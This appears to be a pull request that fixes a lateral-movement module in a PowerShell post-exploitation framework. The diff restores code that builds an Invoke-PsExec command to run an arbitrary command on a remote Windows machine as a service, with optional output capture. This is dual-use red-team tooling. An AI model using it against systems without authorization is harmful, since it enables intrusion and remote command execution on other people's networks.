### PR TITLE
fix the invoke_psexec module

### DIFF
--- a/lib/modules/powershell/lateral_movement/invoke_psexec.py
+++ b/lib/modules/powershell/lateral_movement/invoke_psexec.py
@@ -120,8 +120,12 @@ class Module:
         scriptEnd = ""
         if command != "":
             # executing a custom command on the remote machine
-            return ""
-            # if 
+            customCmd = '%COMSPEC% /C start /b ' + command.replace('"','\\"')
+            scriptEnd += "Invoke-PsExec -ComputerName %s -ServiceName \"%s\" -Command \"%s\"" % (computerName, serviceName, customCmd)
+            
+            if resultFile != "":
+                # Store the result in a file
+                scriptEnd += " -ResultFile \"%s\"" % (resultFile)
 
         else:
 


### PR DESCRIPTION
Hi all,
The invoke_psexec module is bugged when a custom command is provided instead of using the launcher and it raises a `module produced an empty script` error. I think someone forgot to paste the right code in the if statement :laughing:

:sunflower: 